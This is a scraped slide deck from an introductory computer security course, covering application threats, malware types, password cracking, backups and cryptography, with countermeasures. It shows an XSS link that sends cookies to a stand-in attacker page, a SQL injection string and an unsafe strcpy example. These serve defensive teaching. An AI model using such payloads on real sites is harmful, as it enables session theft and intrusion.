Date post: | 01-Jan-2016 |
Category: |
Documents |
Upload: | kirestin-reese |
View: | 20 times |
Download: | 7 times |
Module 04: 1
•Introduction to Computer Securityand Information Assurance
Knowledge Check• Which of the following are operating
system functions?– Process management– Graphics acceleration– Memory management
• Give two countermeasures for the following threats:– Backdoor– DoS
Module 04: 2
•Introduction to Computer Securityand Information Assurance
Objectives• Identify common
threats associated with applications and personal information
• Apply basic techniques to secure individual information on a computer
Module 04: 3
•Introduction to Computer Securityand Information Assurance
Objectives• Apply major appropriate countermeasures
to protect applications from identified threats
• Identify common vulnerabilities in password creation
• Use cryptographic techniques to hide and restore information
Module 04: 4
•Introduction to Computer Securityand Information Assurance
Application Security
• Protection of applications against threats
• Use procedures, software design, and access control to reduce application risk
Module 04: 5
•Introduction to Computer Securityand Information Assurance
Application And OS Security
• Similar threats, vulnerabilities, and countermeasures
• Applications work closely with the OS regarding access, resources, and privileges
Module 04: 6
•Introduction to Computer Securityand Information Assurance
Common Application Security Threats
• Unauthorized access to applications
• Cross-Site Scripting (XSS)
• SQL injection
• Buffer overflow
• Arbitrary code execution
Module 04: 7
•Introduction to Computer Securityand Information Assurance
Unauthorized Access to Applications• Application does not include a mechanism
to control access privilege– Anyone can access the
application– Anyone can run
application• Unauthorized disclosure
of data• Data integrity problems
Module 04: 8
•Introduction to Computer Securityand Information Assurance
Cross-Site Scripting (XSS)• Browser allows code injection
• Attacks the end user, not the server
• User unaware that the page they are seeing has malicious elements
Module 04: 9
•Introduction to Computer Securityand Information Assurance
Cross-Site Scripting (XSS)•Target site
•Attacker
•NORMAL•VALID•SESSION
•security context:•target site
•User views•Web page on•browser normally
•Malicious code•executed.
•Phishing E-mail•From:•Bad Guy•To:•Victim
•CLICK HERE
•Normal•interaction
•User accesses Web page •with malicious code
•Attacker convinces user to access infected Web page
•1•2
•3
•4•5•Info sent to attacker
•Web page displays
•User
Module 04: 10
•Introduction to Computer Securityand Information Assurance
Cross-Site Scripting (XSS)
•<a href="http://…/Search.asp?•Search=<script language='javascript'>•document.location.replace•('http://localhost/EvilPage.asp?•Cookie=‘ + document.cookie);•</script>">…</a>
•HTML code contains embedded JavaScript that redirects to attacker’s page and transmits cookies issued by Search.asp
•URL of the site targeted by the attack
Module 04: 11
•Introduction to Computer Securityand Information Assurance
Structured Query Language (SQL) Injection
• Executes commands not intended by the developer
• Exploits poor input validation
• Coding techniques
Module 04: 12
•Introduction to Computer Securityand Information Assurance
SQL Injection Attack• Normal SQL command:
SELECT *
FROM Members
WHERE name = ”&username&”’;”• Malicious SQL command:
SELECT *
FROM Members
WHERE name = ‘a’ or ‘b’=‘b’;”
Module 04: 13
•Introduction to Computer Securityand Information Assurance
Buffer Overflow• Takes place when too much data is
accepted as input to an application
• Common implementation: attacker gives the program more data than the reserved memory can hold
Module 04: 14
•Introduction to Computer Securityand Information Assurance
Buffer Overflow Example•#include <stdio.h>•#include <string.h>
•void func(char *p)•{• char stack_temp[20];• strcpy(stack_temp, p);• printf(stack_temp);•}
•int main(int argc, char* argv[])•{• func(“I AM MORE THAN TWENTY CHARACTERS LONG!”);• return 0;•}
•38 characters
Module 04: 15
•Introduction to Computer Securityand Information Assurance
Arbitrary Code Execution Vulnerability
• Software bug that allows attackers to execute any commands on target machine– Remote code execution
• Commonly achieved by modifying the program counter of the running process
• Many applications have this vulnerability
Module 04: 16
•Introduction to Computer Securityand Information Assurance
Application Security Countermeasures
• Unauthorized access to
• application
• Cross-Site Scripting (XSS)
• SQL injection
• Buffer overflow
• Arbitrary code execution
Module 04: 17
•Introduction to Computer Securityand Information Assurance
Unauthorized Access Countermeasures
• Determines what object can access application
• Can be implemented based on users, permissions, and folder structures– UserID and
password
Module 04: 18
•Introduction to Computer Securityand Information Assurance
Cross-Site Scripting (XSS)Countermeasures
• Web server owner should:– Keep Web server updated– Scan for XSS vulnerabilities– Configure applications and
servers properly
• User should:– Keep Web browser updated– Practice safe Web surfing– Attend awareness training
Module 04: 19
•Introduction to Computer Securityand Information Assurance
SQL Injection Countermeasures• Input validation• Manual code review• Least privilege• When not required, disable
privileges to stored procedures, tables, etc.
• Limit execution privileges to SELECT, UPDATE, DELETE and user-stored procedures
Module 04: 20
•Introduction to Computer Securityand Information Assurance
Buffer Overflow Countermeasures• Write secure code
• Use compiler tools to detect unsafe instruction sets in applications
• Have a limited number of processes running
• Keep your application updated with latest patches from software vendor
• Control privilege
Module 04: 21
•Introduction to Computer Securityand Information Assurance
Arbitrary Code ExecutionCountermeasures
• Install latest updates and Service Packs
• Disable scripting and ActiveX
• Configure application securely
• Use alternate, safer applications
Module 04: 22
•Introduction to Computer Securityand Information Assurance
Individual Security• Protecting personal systems and
information from attack
• Also known as ‘Personal Security’
Module 04: 23
•Introduction to Computer Securityand Information Assurance
Personal Information Threats• Unauthorized access to personal
information
• Loss of personal information
• Unauthorized disclosure of personal information
• Spoofing
• Malicious software (Malware)
Module 04: 24
•Introduction to Computer Securityand Information Assurance
Unauthorized Access to Personal Information
• Commonly done by cracking user passwords– Recovering passwords from data that has
been stored in or transmitted by a computer system
– Password cracking methods• Dictionary• Hybrid• Brute force
Module 04: 25
•Introduction to Computer Securityand Information Assurance
Activity 05.1: Cracking Windows Passwords
• Purpose:– Show that password cracking is one of the
most common forms of attacks and how easy a weak password can be cracked
• Estimated completion time: – 25 - 30 minutes
• Additional information: – N/A
Module 04: 26
•Introduction to Computer Securityand Information Assurance
Activity 05.1: Password Cracking• How difficult was it to crack the Windows
passwords?
• Why are some passwords easier to crack than others?
Module 04: 27
•Introduction to Computer Securityand Information Assurance
User name PasswordActual order
cracked
Andy Johnson andy 2
Helen Gonzalez helen2008 4
Anthony Jackson Computer 3
Jonas Puente Jonas_Puente 7
Jennifer Dietz marykay 8
Jason Smith htimsnosaj 1
Bianca Lee b1@nc@&l33 11
Mike Hardy cold*beer 6
Carlos Rios 20973 5
Linda Nelson n1h0nj1n 10
Student *pdbmc12 9
Module 04: 28
•Introduction to Computer Securityand Information Assurance
Loss Of Personal Information
•Source: http://www.stellarinfo.com/data_loss.htm, 2007
Software corruption, 25%
Virus attack, 22%
Hardware failure, 13%
Sabotage, 6%
Natural disasters, 2%
Human Error, 32%
Module 04: 29
•Introduction to Computer Securityand Information Assurance
Unauthorized Disclosure Of Personal Information
Module 04: 30
•Introduction to Computer Securityand Information Assurance
Spoofing• A situation in which a person or program
successfully masquerades as another by presenting false information
• Types of spoofing attacks– E-mail spoofing– Web site spoofing
Module 04: 31
•Introduction to Computer Securityand Information Assurance
Malicious Software (Malware)
• Designed to damage or disrupt a system without the owner's consent– Virus– Worm– Trojan horse– Logic/Time bomb– Spyware– Adware
Module 04: 32
•Introduction to Computer Securityand Information Assurance
“Viruses are individual programs that, when placed on a target computer in such a way that they are subsequently executed, (thus ‘infecting’ the computer), can produce results ranging from the innocuous placement of a ‘test’ file to complete deletion of data and reformatting the hard drive.”
•http://www.upenn.edu/computing/security/malware.php
•Virus
Module 04: 33
•Introduction to Computer Securityand Information Assurance
Worm“Worms are programs whose sole purpose is to replicate and spread themselves to other computers. Commonly, once a computer has been infected by a virus/worm (usually by opening an infected e-mail attachment), the virus component will set up and begin running a mail server, and the worm component will begin to replicate the virus/worm and e-mail it to addresses found in the computer's e-mail address book.”
•http://www.upenn.edu/computing/security/malware.php
Module 04: 34
•Introduction to Computer Securityand Information Assurance
“Programs that are designed and written to look like normal, useful programs, but contain hidden code that can perform a wide variety of compromises up to and including granting a remote user complete control of the compromised computer.”
•http://www.upenn.edu/computing/security/malware.php
•Trojan Horse Application
Module 04: 35
•Introduction to Computer Securityand Information Assurance
Logic/Time Bomb“A program, or portion of a program, which lies dormant until a specific piece of program logic is activated. The most common activator for a logic bomb is a date…A logic bomb could also be programmed to wait for a certain message from the programmer.”
•http://www.tech-faq.com/logic-bomb.shtml
Module 04: 36
•Introduction to Computer Securityand Information Assurance
Spyware“Spyware consists of computer software that gathers information about a computer user (such as browsing patterns in the more benign case or credit card numbers in more serious ones) and then transmits this information to an external entity without the knowledge or informed consent of the user.”
•http://www.jellico.com/spyware.html
Module 04: 37
•Introduction to Computer Securityand Information Assurance
Adware“Adware or advertising-supported software is any software application in which advertisements are displayed while the program is running. These applications include additional code that displays the ads in pop-up windows or through a bar that appears on a computer screen.”
•http://www.jellico.com/spyware.html
Module 04: 38
•Introduction to Computer Securityand Information Assurance
Personal Information SecurityCountermeasures
• Password policies
• Backup
• Cryptography
• Spoofing countermeasures
• Malware countermeasures
Module 04: 39
•Introduction to Computer Securityand Information Assurance
Password Policies• Enforce password history – 10 passwords
• Maximum password age – 120 days
• Minimum password age – 5 days
• Minimum password length – 15 characters
• Password must meet complexity requirements – Enable
Module 04: 40
•Introduction to Computer Securityand Information Assurance
What Is A Backup?• Copying files to a second medium for later
retrieval as a precaution in case the first medium fails– Perform frequently– Keep in a separate location
Module 04: 41
•Introduction to Computer Securityand Information Assurance
Why Should We Back Up?•93% of companies that lost their data center for 10 days or more due to a disaster filed for bankruptcy within one year of the disaster. 50% of businesses that found themselves without data management for this same time period filed for bankruptcy immediately. •(Source: National Archives & Records Administration in Washington.)
•Nearly 90% of computer users who had their laptops stolen said the device contained company communications, as well as confidential business and personal information•(Source: Credent Technology)
Module 04: 42
•Introduction to Computer Securityand Information Assurance
Cryptography• Definition
• Services of cryptography
• Public Key Infrastructure (PKI)
•Photo: Enigma machine. Courtesy,
British Royal Navy Museum •Excerpt of Alan Turing’s notes on Enigma,Courtesy British National Archives
Module 04: 43
•Introduction to Computer Securityand Information Assurance
Cryptography Definition• Principles, means, and methods for rendering
plain information unintelligible, and restoring encrypted information to intelligible form
• Encryption transforms data into an unreadable format
• Decryption restores data to its original format• Encryption and decryption schemes are based
upon algorithms
(National Information Systems Security Glossary)
Module 04: 44
•Introduction to Computer Securityand Information Assurance
How Cryptography Works
•Hello!
•qANQR1DBwU4DlCm0PeFuV+8Q23B
•Hello!
•Encryption •Decryption
Module 04: 45
•Introduction to Computer Securityand Information Assurance
Public Key Infrastructure (PKI)• Programs, data formats, procedures,
communication protocols, security policies, and public key cryptography mechanisms working in a comprehensive manner, enabling a wide range of dispersed people to communicate in a secure and predictable fashion
•http://searchsecurity.techtarget.com/generic/0,295582,sid14_gci1328971,00.html
Module 04: 46
•Introduction to Computer Securityand Information Assurance
Services Of Cryptography
• Confidentiality
• Integrity
• Authentication
• Non-repudiation
Module 04: 47
•Introduction to Computer Securityand Information Assurance
Activity 05.2: Cryptography
• Purpose:– Show the role of cryptography in protecting
sensitive information
• Estimated completion time: – 10 - 20 minutes
• Additional information: – You will be able to encrypt and decrypt a file
using Cypherix’s Cryptainer LE program
Module 04: 48
•Introduction to Computer Securityand Information Assurance
Activity 05.2: Cryptography
• How difficult is it to encrypt a message?• How difficult is it to decrypt a message?• How does cryptography help to protect
personal information?
Module 04: 49
•Introduction to Computer Securityand Information Assurance
Spoofing Countermeasures• Practice safe e-mail usage and Web surfing
• Attend security awareness training
Module 04: 50
•Introduction to Computer Securityand Information Assurance
Malware Countermeasures• Only run software you can trust
• Install antivirus software
• Scan file attachments with antivirus software before opening
• Verify critical file integrity
• Backup! Backup! Backup!
Module 04: 51
•Introduction to Computer Securityand Information Assurance
Application And Personal Information Security
• Application security– Common application security threats– Countermeasures
• Personal information security– Common threats to personal information– Countermeasures